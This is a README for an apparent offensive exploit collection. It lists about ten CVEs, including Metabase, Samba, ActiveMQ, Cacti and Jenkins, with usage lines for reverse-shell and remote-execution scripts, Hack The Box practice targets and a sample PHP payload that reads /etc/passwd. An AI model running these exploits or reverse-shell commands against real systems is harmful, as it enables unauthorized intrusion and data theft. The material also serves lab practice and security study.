Exploit Collection

This is my curated collection of working exploits for various vulnerabilities. I will keep updating this repository with new and effective exploits.

CVE-2023-38646 (Metabase)

• CVE ID: CVE-2023–38646
• Description: This vulnerability allowed attackers to execute arbitrary commands on the Metabase server without requiring any authentication.
• Resolved in Metabase versions: 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, 1.43.7.2.
• Usage:

 python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.14.147 --lport 443

CVE-2021-3493 (Ubuntu Overlay fs)

Description: An exploit binary is precompiled if GCC is not available. Compilation:

gcc exploit.c -o exploit

CVE-2023-0386 (Ubuntu Overlay fs)

Description: This exploit is based on this source.

Installation:

make all

How to use:

Start two terminals. In the first terminal, type:

./fuse ./ovlcap/lower ./gc

In the second terminal, type:

./exp

CVE-2007-2447 (SMB version 3.0.20)

Description: An HTB (Hack The Box) exploit for SMB version 3.0.20. Usage:

python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>

Requirements:

pip3 install pysmb

CVE-2015-6967 (Nibbleblog 4.0.3)

Description: An Exploit for the nibbleblog 4.0.3 where the admin credentials must be known Usage:

exploit.py [-h] --url URL --username USERNAME --password PASSWORD --payload PAYLOAD

If you came here after HTB nibbles: the credentials are admin nibbles , you just have to guess them , no hint there or bruteforcing

---

CVE-2023-23752 (Joomla Authentication Bypass Information leak)

Usage:

usage: CVE-2023-23752.py [-h] -u URL [-o OUTPUT_FILE]

Joomla CVE-2023-23752 exploit

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL with a trailing slash
  -o OUTPUT_FILE, --output-file OUTPUT_FILE
                        File to write the output to

---

CVE-2009-2265 {Apache ColdFusion 8.0.1 - Arbitrary File Upload / RCE}

I Do not own this exploit but I kept it here for ease of individuals This exploit belongs to : Pergyz at https://www.exploit-db.com/exploits/50057

HOW to RUN: Just run the payload it will ask for your IP and port and the one you want to attack

where to practice: HTB Arctic {Easy,windows}

---

CVE-2023-46604 {Apache MQ RCE}

This exploit was inspired by the exploit from: https://github.com/X1r0z/ActiveMQ-RCE from X1r0z , also:

This blog will help you exploit : https://www.prio-n.com/blog/cve-2023-46604-attacking-defending-ActiveMQ

I wrote a small research which can be read here which will help you understand underlying process: https://anekant-singhais-organization.gitbook.io/why-so-script-kiddie/cve-explained-cve-2023-46604

Usage:

CVE-2023-46604.py -ip <ip> -p <port default 61616> -u <url of XML>  -t {optional for encrypted}

I also attached the xml file. Edit the commands you want to run on host server.

---

CVE-2019-9978 {RCE in Social WarFare Plugin}

The python3 version is written by me . The original exploit belongs to Researcher: Luka Sikic Author: hash3liZer

Usage: Start the server where you put the exploit file containing exploit in the "pre" tags like:

<pre>system('cat /etc/passwd')</pre>

python3 exp.py -t <target-url> --payload-uri <exploit-file uri>

---

CVE-2022-46169 {Exploit for the RCE vulnerability of cacti server}

Usage:

python3 exploit.py -t <server-url> -lh <listener host> -lp <listeneter port>

where to practice: HTB: monitortwo

How to setup server: vicarius explained and told how to configure: https://www.vicarius.io/blog/unauthenticated-rce-in-cacti-cve-2022-46169

---

CVE-2024-23897 {Jenkins arbitrary file read}

Usage:

python3 jenkins_exploit.py -u <url-for-jenkins> -f <file-to-read>

Where to practice: HTB: Builder

Research on this CVE {By me!!}: https://anekant-singhais-organization.gitbook.io/why-so-script-kiddie/cve-explained-cve-2024-23897

Feel free to add, update, or modify the exploits in this collection. Keep hacking! 🐱‍💻💥